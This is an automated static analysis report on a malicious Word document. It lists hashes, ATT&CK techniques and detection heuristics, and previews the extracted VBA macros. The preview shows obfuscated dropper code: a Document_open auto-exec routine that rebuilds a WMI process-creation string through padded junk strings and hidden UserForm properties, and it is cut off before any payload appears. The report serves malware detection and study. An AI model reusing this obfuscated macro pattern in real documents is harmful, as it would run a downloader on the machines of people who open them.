Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab1cd40376eba2a0…

MALICIOUS

Office (OLE)

199.2 KB Created: 2020-08-19 11:17:00 Authoring application: Microsoft Office Word First seen: 2020-09-07
MD5: ec3a1df721e140a78f8a2808260b9761 SHA-1: 5988d1f4077474ee8630c85c671073929ae21988 SHA-256: ab1cd40376eba2a0465c99926c13d8e538fd6acdf6db61bdff48ddda2e33a6f6
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros. The 'Document_Open' macro, combined with 'CreateObject' and a hidden UserForm property read, indicates a command stager is present. This stager is likely responsible for downloading and executing a second-stage payload, as suggested by the ClamAV detection name 'Doc.Downloader.Generic-9395228-0'. The VBA code itself is heavily obfuscated with meaningless variable names and conditional logic that does not appear to alter the execution flow, but the presence of the auto-execution mechanism and the detection name strongly suggest a downloader functionality.

Heuristics 7

  • ClamAV: Doc.Downloader.Generic-9395228-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-9395228-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15320 bytes
SHA-256: 3a5ca1cb029182a187d55bdd9e3a0275dac6e6c87fd330520b412e7854030542
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Agfgzat7amxttb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
C7wkdr5lsrq4.Ou1lz1qo61ui8z40y9
End Sub


Attribute VB_Name = "C7wkdr5lsrq4"
Attribute VB_Base = "0{7E03D258-43AA-4CD8-97CC-2D0C403371CB}{4226C4BA-E15B-445C-BD37-DDE06622C570}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Ou1lz1qo61ui8z40y9()
   Fr8v2zls8b2y = "995"
If Len("NywjikcwapucOp6uqmq4qp636j411i") = Len("X2irmo2chuhbns5f8x") + 1 Then End
If Len("Ppimdj2soaj7lPggl9sgzjiiiMkae8dnxtyoei") < Len("Xnb9y763my50eg8") Then
        MsgBox "Ad78jin8n39u" + "N3h18jmhlvm"
        MsgBox ("T0nl00g1nykjlm")
        MsgBox "Afv70lz57xih9u01" + "Nptj_wp52516r9o"
End If
If Len("Omc1zohbery12jfY2285paugchr_0") = Len("S6xni8_6ehrft9") Then
       MsgBox "Cszl71gr2fltuwh1" + "Ec_7d89s_8w"
       MsgBox ("Ikswr_14zczsn8h9 !!!")
       MsgBox "Lj9rq0q05_v24" + "Vu3o748cxr9ndorsg1"
End If

Irt4xutdkcwg = C7wkdr5lsrq4.HelpContextId + 50 + 50
   Wzgbiy4paglhik = "595"
If Len("Uycab2nh0_dxZs0pfs7_ify7zf2") = Len("Cqexke7r8xx") + 1 Then End
If Len("Mhcfbhqsi8b1ohvKemwxf6t0am5xstWntads6rzi5hopi") < Len("Omc3ka7lnth") Then
        MsgBox "Ww72nt6bzuq" + "H68omxeu3kjkq3i7ri"
        MsgBox ("Ol5xcnd67uho_8f")
        MsgBox "Kds_2oyjvmvlwl" + "Oq96wqi5aj4j_u7knk"
End If
If Len("U3_j7gxub233iPy9cbubgjr20ez1") = Len("Biamshuhcz07hdjr") Then
       MsgBox "So80hl2ixsst8c0" + "Iyu37cnd1_nvf0gij"
       MsgBox ("Kk5268kd71czgx !!!")
       MsgBox "A7q1zyya4ji9fcymkj" + "Qzbw4xs3gyba52"
End If

R1mnoqp3mqpcw58r1 = ChrW(Irt4xutdkcwg + (15))
   D5cqn6l9jih3u = "891"
If Len("Q3a39e80frpDscsykqk42tml8ur3") = Len("Y75ymti4ixohywat15") + 1 Then End
If Len("Tu9ljl7izrbupgjtuMfuk7c58vd9Ug2wbmauunqku") < Len("Ec0bpdqtiymry") Then
        MsgBox "Mn14lnz645e9saqe1j" + "O720uy56j9dkvyec"
        MsgBox ("Qx0gxmke9rvq")
        MsgBox "D0c2ea2pges" + "L81utko0jrclu9t"
End If
If Len("Vxhjpg5fi5udl3Nryhpuvohhs5x7") = Len("Fgsjvt9idjdul12k") Then
       MsgBox "Mau671d9jj_b8ngj" + "Qnwbg9viu0m_jy"
       MsgBox ("Y7mxl7lrommk0h !!!")
       MsgBox "X8l5cnyvlc_x" + "T29avsebau9wm"
End If

Ucxo09ox51xnyxh = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + R1mnoqp3mqpcw58r1 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + C7wkdr5lsrq4.I0cow5hthsij4 + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Okt9g0iidmg7 = "530"
If Len("Uovf0ybcnh22bho7T8pl9v9shx1qh") = Len("Kd3dnp6xykdhd3ge26") + 1 Then End
If Len("Tvkql65xx3amxHmykebqteieiMflc87drlexqiu4h") < Len("Q0rb4qt6w48hqbmdf") Then
        MsgBox "Ml1eqtz_ha58r" + "Ikvg2z114hkchj7c"
        MsgBox ("Idil7ett9m5is")
        MsgBox "Smi7grgnqw2" + "N5nmqdf1s5jnqfb"
End If
If Len("Vm7slgv20n1wf_xwJw1fw81c3t8c7qa") = Len("Nud1ihnjxodotv") Then
       MsgBox "Ex4cumshqgptxz" + "B8zgxqt8lfjrth5m"
       MsgBox ("Fb1qdord_myu4z1 !!!")
       MsgBox "Ylg1m0bx2r8l7_a" + "V7lw0i0thdxe7mtr"
End If

Add_aj_cn46 = Eu3m8wwsydv9fe(Ucxo09ox51xnyxh)
   Cpl6t_e99clkzbp = "949"
If Len("PhatiltzgawroD74nmnyvvbd2euwj") = Len("Awwbw7dm48xztnxt") + 1 Then End
If Len("Ypslzcwaw_psZd9mv74ytazaMa8c
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.